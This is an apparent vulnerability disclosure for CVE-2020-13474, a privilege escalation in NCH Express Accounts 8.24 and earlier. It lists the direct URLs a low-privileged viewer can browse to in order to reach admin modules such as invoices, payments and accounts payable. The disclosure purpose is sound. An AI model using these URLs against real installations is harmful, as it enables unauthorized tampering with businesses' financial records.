CVE-2020-13474: NCH Express Accounts- Privilege Escalation

Vulnerable Software: NCH Express Accounts

Vulnerability: Privilege Escalation

Affected Version: 8.24 and prior

Vendor Homepage: https://www.nchsoftware.com/

CVE: CVE-2020-13474

CVE Author: Tejas Nitin Pingulkar

Exploit Available: Yes

About Affected Software

Express Accounts is professional business accounting software, perfect for small businesses needing to document and report on incoming and outgoing cash flow, including sales, receipts, payments, and purchases.

Additional Information

NCH Express Accounts software allows you to access it over the web.

A web interface provides three types of user

  • Administrator
  • User
  • Viewer

The administrator user has access to all modules, including Create a new invoice, Create a new quote, Create new sales order, Create new purchase order, Apply customers payment, View Credit notes, Enter new accounts payable, view chart of Accounts, Make a Payment, Receive a payment, Add new item, Add new customer, Suppliers list, Add/Edit users.

User with viewer privileges don’t have access to above-mentioned functionalities by forceful browsing. We will access admin modules using viewer user privileges

Exploit

I have created below users for POC

Admin user: admin@tejas.com

Viewer user: lowuser@tejas.com

As demonstrated in video, “chart of accounts” has only one entry, and lowuser@tejas.com don’t have access to “chart of accounts” functionality (or any other module mentioned above) reference video [2:14 min]

login as low privileged user and enter the below URL

http://[website:port]/acclist

Click add new account

fill in all details click okay

Via forceful browsing, we were able to add an entry as low user

Similarly below via forceful browsing, we can access below mentioned functions

Add New Invoice: http://[website:port]/invoiceprop?onok=invoicelist&oncancel=invoicelist

Add New Quote: http://[website:port]/quoteprop?onok=quotelist&oncancel=quotelist

Add New Sales Order: http://[website:port]/orderprop?onok=orderlist&oncancel=orderlist

Add New Purchase Order: http://[website:port]/porderprop?onok=porderlist&oncancel=porderlist

Payment:http://[website:port]/porderprop?onok=paymentlist&oncancel=paymentlist

Credit Notes:http://[website:port]/creditnotelistperiod

Account Payable: http://[website:port]/accpayable?onok=billlist&oncancel=billlist

Chart of Accounts: http://[website:port]/acclist (video POC)

Payments and Purchases: http://[website:port]/cashtxn?payment=1

Receipts and Deposits: http://[website:port]/cashtxn?payment=0

Add New Item: http://[website:port]/itemprop?onok=itemlist&oncancel=itemlist

Add New Customer: http://[website:port]/customerprop?onok=customerlist&oncancel=customerlist

Suppliers List: http://[website:port]/supplierlist

Proof Of Concept

CVE-2020-13474: NCH Express Accounts- Privilege Escalation

3 thoughts on “CVE-2020-13474: NCH Express Accounts- Privilege Escalation

Leave a Reply

Your email address will not be published. Required fields are marked *

Scroll to top